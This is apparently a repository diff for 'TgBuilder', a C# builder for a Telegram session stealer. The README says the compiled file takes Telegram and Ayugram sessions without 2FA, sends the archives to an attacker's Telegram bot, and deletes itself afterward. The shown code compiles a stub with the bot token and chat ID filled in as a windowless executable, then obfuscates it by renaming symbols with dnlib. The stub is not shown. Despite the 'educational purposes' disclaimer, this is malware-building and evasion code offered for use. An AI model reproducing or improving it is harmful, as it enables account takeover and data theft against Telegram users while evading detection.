-

README.md

@@ -0,0 +1,36 @@
+![CSHARP](https://img.shields.io/badge/Language-CSHARP-aquamarine?style=for-the-badge&logo=csharp)
+
+![Banner](banner.png) 
+
+
+# 🛡️ <b>About</b> 
+><b>A program demonstrating some flaws in the telegram application that allows access to other sessions without the need to enter 2fa and so on. The project has its own builder that will eventually compile a file, when launched, the actions to steal sessions will begin. The module supports the theft of sessions of 2 clients, this is the official Telegram and its modified version Ayugram.The archives themselves are sent to the telegram bot 
+
+# 🖥️ <b>Working Graph:</b>
+>![Graph](work_banner.png)
+
+
+# ⚙️<b> Features</b>
+- **2 client telegram supporting**: <b>Telegram / Ayugram</b>
+- **Melt File**: Self-removal function after the main program work
+
+
+<b>Additionally, the project includes: </b>
+
+- **Conditional Compilation**: Only the selected features are compiled into the final build, reducing the footprint and improving performance.
+- **Custom Obfuscation Engine**: Features renaming of functions, without affecting functionality.
+
+<br>
+
+## ⚠️  **Disclaimer**: 
+```
+This project is for educational purposes only, intended for studying malware and security techniques. The author is not responsible for any malicious use of this software.
+```
+<br>
+
+# ⭐ Credits 
+- **Author**: <a href="https://github.com/k3rnel-dev">@K3rnel-Dev</a>
+- **dnlib**: A library for manipulating .NET assemblies.  
+  GitHub: [https://github.com/0xd4d/dnlib](https://github.com/0xd4d/dnlib)
+
+---

src/TgBuilder.sln

@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.11.35208.52
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TgBuilder", "TgBuilder\TgBuilder.csproj", "{F87A8322-E2B4-4A0D-B691-AA0710284377}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{F87A8322-E2B4-4A0D-B691-AA0710284377}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{F87A8322-E2B4-4A0D-B691-AA0710284377}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{F87A8322-E2B4-4A0D-B691-AA0710284377}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{F87A8322-E2B4-4A0D-B691-AA0710284377}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {A07733D5-2859-4821-BDC6-777E8E24D4F6}
+	EndGlobalSection
+EndGlobal

src/TgBuilder/Core/Compilator.cs

@@ -0,0 +1,57 @@
+using Microsoft.CSharp;
+using System;
+using System.CodeDom.Compiler;
+using System.IO;
+
+namespace TgBuilder.Core
+{
+    internal class Compilator
+    {
+        public static string Compilate(string Token, string Chatid, string outFile, bool Obfuscate, bool Melting)
+        {
+            string csharpcode = Properties.Resources.stub
+                .Replace("%TOKEN_BOT%", Token)
+                .Replace("%CHATID%", Chatid);
+
+            CompilerParameters parameters = new CompilerParameters
+            {
+                GenerateExecutable = true,
+                OutputAssembly = outFile,
+                CompilerOptions = "/target:winexe /platform:x86",
+                IncludeDebugInformation = false
+            };
+
+            if (Melting)
+            {
+                parameters.CompilerOptions += " /define:Melting";
+            }
+            parameters.ReferencedAssemblies.Add("System.dll");
+
+            using (CSharpCodeProvider codeProvider = new CSharpCodeProvider())
+            {
+                CompilerResults results = codeProvider.CompileAssemblyFromSource(parameters, csharpcode);
+
+                if (results.Errors.Count > 0)
+                {
+                    using (StreamWriter writer = new StreamWriter("compilation_errors.txt", true))
+                    {
+                        foreach (CompilerError error in results.Errors)
+                        {
+                            writer.WriteLine($"Error: {error.ErrorText} in {error.FileName} at {error.Line}:{error.Column}");
+                        }
+                    }
+                    throw new InvalidOperationException("Failed to compile the stub. Check compilation_errors.txt for details.");
+                }
+            }
+
+            if (Obfuscate)
+            {
+                string result = Obfuscator.PerformObfuscation(outFile);
+                return $"Success to compiling:{Path.GetFileName(outFile)}\nResult obfuscation: {result}";
+            }
+
+            return $"Success to compiling output file: {Path.GetFileName(outFile)}";
+
+        }
+    }
+}

src/TgBuilder/Core/Obfuscator.cs

@@ -0,0 +1,130 @@
+using dnlib.DotNet.Emit;
+using dnlib.DotNet;
+using System.Linq;
+using System;
+using System.IO;
+
+namespace TgBuilder.Core
+{
+    internal class Obfuscator
+    {
+        public static string PerformObfuscation(string outputFile)
+        {
+            string directory = Path.GetDirectoryName(outputFile);
+            string originalFileName = Path.GetFileName(outputFile);
+            string moduleNew = Path.Combine(directory, $"tmp_{originalFileName}");
+            try
+            {
+                File.Copy(outputFile, moduleNew, overwrite: true);
+                using (ModuleDef module = ModuleDefMD.Load(moduleNew))
+                {
+                    RenameProtector.Execute(module);
+                    module.Write(outputFile);
+                }
+
+                return "Successfull";
+            }
+            catch (Exception ex)
+            {
+                return $"Obfuscation failed: {ex.Message}\nFailed method: {ex.TargetSite}";
+            }
+            finally
+            {
+                File.Delete(moduleNew);
+            }
+        }
+
+        public static class RandomUtils
+        {
+            private static Random random = new Random();
+
+            public static string RandomString(int length)
+            {
+                const string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+                return new string(Enumerable.Repeat(chars, length)
+                    .Select(s => s[random.Next(s.Length)]).ToArray());
+            }
+        }
+
+        public class RenameProtector
+        {
+            public static int count_xxx = 0;
+
+            public static void Execute(ModuleDef module)
+            {
+                try
+                {
+                    module.Name = RandomUtils.RandomString(7);
+
+                    foreach (var type in module.Types)
+                    {
+                        if (type.IsGlobalModuleType || type.IsRuntimeSpecialName || type.IsSpecialName || type.IsWindowsRuntime || type.IsInterface)
+                            continue;
+
+                        count_xxx++;
+                        type.Name = RandomUtils.RandomString(40);
+                        type.Namespace = "";
+
+                        foreach (var property in type.Properties)
+                        {
+                            count_xxx++;
+                            property.Name = RandomUtils.RandomString(40);
+                        }
+
+                        foreach (var field in type.Fields)
+                        {
+                            count_xxx++;
+                            field.Name = RandomUtils.RandomString(40);
+                        }
+
+                        foreach (var eventDef in type.Events)
+                        {
+                            count_xxx++;
+                            eventDef.Name = RandomUtils.RandomString(40);
+                        }
+
+                        foreach (var method in type.Methods)
+                        {
+                            if (method.IsConstructor) continue;
+                            count_xxx++;
+                            method.Name = RandomUtils.RandomString(40);
+
+                            foreach (var param in method.ParamDefs)
+                            {
+                                count_xxx++;
+                                param.Name = RandomUtils.RandomString(40);
+                            }
+
+                            if (method.HasBody)
+                            {
+                                foreach (var local in method.Body.Variables)
+                                {
+                                    count_xxx++;
+                                    local.Name = RandomUtils.RandomString(40);
+                                }
+
+                                foreach (var instr in method.Body.Instructions)
+                                {
+                                    if (instr.OpCode == OpCodes.Ldloc || instr.OpCode == OpCodes.Stloc)
+                                    {
+                                        var localVar = instr.Operand as Local;
+                                        if (localVar != null && localVar.Name != null)
+                                        {
+                                            count_xxx++;
+                                            localVar.Name = RandomUtils.RandomString(40);
+                                        }
+                                    }
+                                }
+                            }
+                        }
+                    }
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine($"An error occurred during renaming: {ex.Message}");
+                }
+            }
+        }
+
+    }
+}